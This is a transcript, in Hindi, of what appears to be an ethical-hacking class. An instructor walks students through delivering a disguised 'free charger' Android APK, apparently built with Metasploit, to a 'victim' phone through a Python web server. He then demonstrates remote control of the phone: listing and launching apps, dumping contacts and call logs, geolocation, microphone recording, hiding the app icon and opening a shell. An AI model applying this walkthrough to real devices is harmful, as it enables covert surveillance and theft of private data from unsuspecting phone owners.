एंटर हो गया सब। नाउ अब रन करने से पहले इसको हम क्या करेंगे, सेंड कर देंगे विक्टिम के पास। ठीक है, तो विक्टिम पास सेंड करने के लिए मैं क्या कर रहा हूँ, यहाँ पे एक सर्विस स्टार्ट कर देते हैं cd desktop ls आ रही है ना। हाँ मैंने यहाँ पे स्टार्ट किया python -m simple
HTTP सर्वर 4444, ठीक है। पाइथन सर्वर स्टार्ट किया मैंने, यहाँ पे पाइथन सर्वर स्टार्ट हो गया। मुझे बस यहाँ पे आईपी डाल के उसको एक्सेस करना है। तो 192.168.1.92:4444 एंटर। ओके, मेरी आईपी है 96। एक मिनट, मैंने यहाँ पे 92 दिया है, तो मुझे इसे चेंज करना पड़ेगा। गलत दे रखी है तभी नहीं देगा। एल पोर्ट एलहोस्ट सर। 92.1.96 है। सर एलहोस्ट। चलो सही हो गई होगी। एक बार दोबारा देख लेते हैं शो ऑप्शंस में। हाँ 96 ऊपर जो हमने बनाया था उसमें 96 ही दी थी ना, 96, ठीक है। तो यहाँ पे मुझे पाइथन सर्वर दोबारा से स्टार्ट करना पड़ेगा। आईपी गलत दे रखी है हमने। अच्छा, पाइथन सर्वर स्टार्ट है तो आईपी वहाँ पे सही कर देते हैं, है ना। तो 192 की जगह हो जाएगा 196। आगे फाइल तो फ्री चार्ज पे क्लिक किया, ओके, डाउनलोड, ओपन, इंस्टॉल, डन। इंस्टॉल हुई, वहां आ जाओ, जस्ट क्लिक टू रन। विक्टिम क्या करेगा, उसको जब पहली बार में इंस्टॉल किया उसने, उसको लॉन्च करेगा, वो गया वहां पे, उससे यहाँ पे आ रहा होगा मेन एक्टिविटी करके, ठीक है। Where is my file? Where is my file? Where is my file? Okay. Yeah. Open. ऑल में सारी चीजें एक्सेस मिल रही है। ओके, इंस्टॉल, डन। ऐप नॉट इंस्टॉल्ड बता रहा है वो। हाँ बता रहा है, ऐप नॉट इंस्टॉल दिखा रहा है सर ऊपर। ऐप कॉन्फ्लिक्ट और अच्छा इसलिए कर रहा है क्योंकि ऑलरेडी पहले से इसके अंदर एक पड़ी हुई है, तो हमें उसे हटाना पड़ेगा। जस्ट गो टू द सेटिंग्स, कम एप्स के अंदर आ जाओ, एंड यहाँ पर ऑलरेडी एक फाइल होगी, लेट्स सर्च। एक तो ये भी हटा देते हैं, इंस्टॉल। एक और होगी, देखो मेन एक्टिविटी के नाम से, कहाँ गई, ये नहीं है, वेब स्लॉट, ओके, पिक्सल, ये रही मेन एक्टिविटी, इसको हटाओ, ठीक है। अब इंस्टॉल हो जाएगी। हो गई, ओपन किया, कनेक्शन आ गया, देखो इधर, ठीक है। मेटाडाटा मिल गया मेरे को। अब मेटाडाटा मिलने के बाद आप यहाँ पे टाइप करो हेल्प, एंटर किया तो देखो अलग अलग चीजें चेक कर सकते हैं, जैसे कि ऐप लिस्ट वगैरह हम चेक कर सकते हैं यहाँ पर। तो इसको करते हैं थोड़ा सा छोटा ताकि वहां से हमें दिखे। ओके, तो मैंने यहाँ पे डाला ऐप लिस्ट, तो देखो सारी ऐप लिस्ट यहाँ पे आ रही है, छोटा इसको, ठीक है। अब देखो इसमें क्या है, पैकेजेस के नाम आ रहे हैं ये सारे, इसमें से आप जो सा ही पैकेज इसमें रन कराना चाहो वो पैकेज रन करा सकते हो। जैसे कि लेट अस सपोज आई जस्ट वांट टू रन कैलेंडर पैकेज, तो जस्ट कॉपी द कैलेंडर पैकेज, यहाँ पे आओ, ऐप रन एंड पाथ दे दो, मतलब पैकेज का नाम दे दो, एंटर करोगे, एक्टिविटी देखो, लुक एट हियर, कैलेंडर ओपन हो गया, ठीक है। फिर मुझे कोई और पैकेज रन कराना है, जैसे कि मैं चाहता हूँ कैलेंडर रन कर, कैलकुलेटर रन कराना, मैंने यहाँ से कैलकुलेटर वाला पैकेज उठा लिया,
ऐप रन कैलकुलेटर एंटर, कैलकुलेटर ओपन हो गया है ना। आप कुछ और ओपन कराना चाहते हो लाइक यूट्यूब वगैरह, यूट्यूब है वहां पे, यूट्यूब है, जीमेल है, चलो जीमेल ओपन करा लेते हैं फिर। जीमेल है, वेयर इज द जीमेल, जीमेल जीमेल गूगल, ये रहा जीमेल, ठीक है। जीमेल रन करा सकते हो। जो पैकेजेस हैं आप उनको, ये सारे पैकेजेस वहां पे बेसिकली अवेलेबल हैं। यूट्यूब भी देखो, ये रहा यूट्यूब भी पड़ा है, ठीक है। तो ऐप रन जीमेल एंटर, जीमेल खुल गया, गॉट इट। और उसके बाद कोई मेल आईडी तो है नहीं, है ना, तभी नहीं दिखा रहा। यूट्यूब का रन कराना है, यूट्यूब का रन करा लो। जो पैकेज आप चाहते हो रन कराना, उसका भी यहाँ पे ऐप को रन करा सकते हो इधर पैकेज में, ठीक है। उसके बाद क्या है, हम फिर से हेल्प डालते हैं, ओके। तो ऐप इंस्टॉल कराना चाहते हो कोई सा प्ले स्टोर से, तो ऐप इंस्टॉल करा सकते हो, पैकेज नेम दे दो उसको, वो इंस्टॉल कर देगा। ऐप लिस्ट हमने देख लिया, ऐप रन देख लिया। कोई ऐप अनइंस्टॉल कराना चाहते हो तो उसका पैकेज नेम दो, वो वहां से अनइंस्टॉल कर देगा। तो पैकेज नेम देख लेते हैं सबसे पहले हम, जैसे कि कौन सा कराएं, कौन सा कराएं, ये ज़ेंटी वाला पड़ा है, इसी को हटा देते हैं, ठीक है। जस्ट कॉपी इट, ज़ेंटी एंड ऐप uninstall and package name, enter। लो पूछ रहा है डू यू वांट टू अनइंस्टॉल, ओके किया, क्या है, ठीक है। और क्या कर सकते हैं, देखो और कितने सारे कमांड है। आप वहां से रिकॉर्ड कर सकते हो उसके माइक, वेबकैम चैट कर सकते हो, वेब लिस्ट चेक कर सकते हो, वेब स्नैप्स ले सकते हो, वेब स्ट्रीमिंग कर सकते हो। उसके लिए क्या चाहिए, कैमरा चाहिए। उसमें कैमरा नहीं है, डेट्स हम नहीं कर पाएंगे। रिकॉर्ड माइक प्ले करा सकते हो कुछ, तो अगर आपके पास कोई ऑडियो पड़ी हुई है तो आप प्ले यूज करो और अपना पाथ दे दो। जैसे मैंने प्ले यूज किया, ठीक है, और जो भी ऑडियो थे मेरे पास मैंने उसका पाथ दे दिया यहाँ पे। तो रन करते ही उसके सिस्टम में से साउंड प्ले होने लगेगी उसके मोबाइल में से। डम कर सकते हो, कॉल लॉग, डम कॉन्टैक्ट, डम जियो लोकेट देख सकते हो उसका। हाइड ऐप आइकन, अब ऐप का आइकन देखो यहाँ पे आ रहा होगा कहीं पे, मेन एक्टिविटी, इसे आप हाइड करा सकते हो, ठीक है। मैंने इसे कॉपी कर लिया, जस्ट पेस्ट हाइड ऐप आइकन। तो इट विल टेक फ्यू सेकंड्स एंड देन क्या होगा, आपका आइकन जो है वो यहाँ से हाइड कर देगा कंप्लीटली। लो गया आइकन, देखो हो गया, ठीक है। तो इसके लिए सेंड कर सकते हो एसएमएस, वेग लॉग देख सकते हो, डब्ल्यू लैन जियो लोकेट देख सकते हो, है ना। प्लस शेल ले सकते हैं इसका, जैसे कि मैं यहाँ पे चला गया, मैंने टाइप कर दिया SHEL शेल, तो शेल मिल गया मेरे को। मैं IF कॉन्फ़िग करके या दूसरी कोई भी कमांड यूज करके चेक कर सकता हूँ जो चाहे वो, राइट। मुझे IP देखो दिखा रहा है कि iNet के साथ क्या कनेक्ट है। LS करोगे कहीं पे है नहीं, हम डायरेक्टरी, तो डायरेक्टरी नॉट फाउंड, कोई डायरेक्टरी नहीं है यहाँ पे, ठीक है। आप CD करके चेंज कर सकते हो, सॉरी MK करके, MKDIR करके कोई डायरेक्टरी बना सकते हो, इट्स अप टू यू। मैंने बनाई है हेलो नाम से, एंटर किया, LS किया, नाउ लुक एट हियर, हेलो मिल रही है। आप जो चाहे वहां पे यहाँ पे इंस्टॉल करा सकते हो, तो आपके ऊपर है कि आप क्या क्या कमांड यहाँ पे यूज करते हो। मैं यहाँ पे यूज कर सकता हूँ यूनेम, तो यूनेम से मुझे बता देगा, सारे लिनक्स वाले कमांड यूज होंगे, ठीक है। यूनेम लिनक्स बता रहा है, यूनेम -a मैंने यूज किया, पूरा डिवाइस का वो बता रहा है। फिर मैंने यूज किया चेक, अच्छा चेक रूट यहाँ नहीं चलता, ठीक है। मैंने यहाँ पे यूज किया यूनेम हो गया, लिनक्स हो गया, यूनेम -a हो गया, who am I, अच्छा एक साथ होता है who am I, तो देखो बता रहा है नाम क्या है इसका। हेलो सर। हाँ सर अगर हमने जैसे किसी विक्टिम को एप्लीकेशन भेजी, ठीक है, क्या भाई जी, ये एप्लीकेशन भेजी हमने किसी विक्टिम को, ओके। और अगर उसने आगे भेज दी और कहीं तो अगर उसने आगे भेज दिया तो तुम्हें उसका कनेक्शन मिलने लगेगा, अगर उसने इंस्टॉल कराई तो। और उसका नहीं मिलेगा जिसके पास हमने भेजी थी। जो डाउनलोड करेगा, जो रन कराएगा, तुम्हें उसका मिलेगा।
अगर दो लोगों ने कर दिया तो एक ही फाइल को? तो दोनों का मिलेगा, अच्छा, तो दोनों को मिल जाएगा। दोनों का मिल जाएगा। सेशन अलग अलग क्रिएट हो जाएंगे, सेशन में चेक कर लो, या कंट्रोल सी टर्मिनेट दिस सेशन, यस, है ना। यहाँ पे टाइप करो सेशन, एंटर, सेशन, अच्छा स्पेलिंग गलत है, नाउ कमांड नहीं यहाँ, अच्छा बैक आ इसे जाओ, एग्जिट, है ना। अब यहाँ पे टाइप करो, अगर सेशन क्रिएटेड है तो ये आपको सेशन दिखा देगा सारे। सर सेशंस नो एक्टिव सेशन, ओके सर, ओके। सेशन है, आप जिसका जिसका कनेक्टेड होगा उसका दिख जाएगा, ठीक है। ठीक है सर। तो ये था आपका, इसके थ्रू हम क्या क्या कर सकते हैं। एक्टिविटी के लिए बहुत कुछ है, बट मेन सिस्टम पे ज्यादा एक्टिविटीज होती हैं, तो आप इसको रन कराओ अपने सिस्टम पे, चेक करो, देखो क्या क्या आपको मिल रहा है, एंड फिर मुझे बताना कि क्या क्या आपको मिला, ठीक है। यस सर। तो मैं इसका वो भेज देता हूँ आपको, क्या कहते हैं कि कैसे कैसे करना है आपको, कमांड क्या थे, जस्ट गिव मी अ मिनट। सर मैंने ऐसा ही एक ऐप बना रखा है पहले। अच्छा, बढ़िया बात है। सर अपने फोन में कराया ना मैंने रन, हाँ हाँ, तो सर मेरे फोन ने उसे इंस्टॉल ही नहीं होने दिया। बार बार अलार्म में बजा देता था, रेड हो जाता पूरा फोन और अलार्म बजा देता था बार बार। क्यों? कि मतलब कोई ट्रोजन या फिर एंटीवायरस आ चुका, मतलब वायरस आ चुका है फोन के अंदर। गूगल प्ले प्रोटेक्ट सर। अच्छा, अभी कौन से ऐप का नाम बता देते तुम? ऐप मतलब क्या सर? अभी कुछ बताए थे ना, किस कौन बोल रहा था अभी कि मैंने उस वाले ऐप से किया है? ना सर, मैंने ये बनाया, ये जैसे आपने बनाया ना फ्री चेंजर ऐप APK। नहीं नहीं नहीं, अभी जैसे एमएसएफ वैनम की बात हो रही थी, जो किसी ने बोला था ना एमएसएफ वैनम। ना ना, वो नहीं बनाया सर, ये बनाया था ऐसा जैसे ये है। अभी कौन बोल रहा था कि एमएसएफ वैनम की जगह पे कोई सा यूज किया है? ऐसा मैंने हाँ, कौन सा? मैंने MSF PC और सर MSF कंसोल का एक GUI मोड भी आता है ना, केज नाम हाँ से। हाँ हाँ, हाँ तो वो भी सही है, मतलब उसमें कमांड डालने की जरूरत नहीं, सीधा ग्राफिकल इंटरफेस देता है वो कौन सा कह मेटास्प्लोइट रहा है? का। एमएसएफ पीसी ना? नहीं, केज नाम का ग्राफिकल इंटरफेस आता है नहीं, वो मेटास्प्लोइट तो का। आता है, वो नहीं, मैं उससे हाँ पहले वाला पूछ रहा है, एमएसएफ पीसी हाँ बोल रहा हूँ ना तुम? हाँ हाँ। हाँ, ठीक है। तो हाँ। तेरे को मैंने तुम लोग को चैट पे भेजा है, मिला? यस सर। मिल गया ना कमांड? यस सर। यस बढ़िया, सर। तो यूज करो, इसको बनाओ, ठीक है। एंड देन फिर मिलते हैं अपने कल, मतलब मंडे को। एंड मंडे को होप सो आपका ये खत्म हो जाएगा, कि मंडे को हमारा लास्ट सेशन है, इसमें हमारा IoT और क्लाउड का केवल इंट्रोडक्शन पार्ट है, तो जल्दी खत्म हो जाएगा, ठीक है। यस ठीक है। सर। ओके गाइस, तो करो जब तक आपके पास टाइम है मंडे तक, तो पूछना हो तो पूछ लेना मंडे वाली क्लास में। यस सर। ओके, बाय बाय। बाय सर। बाय सर।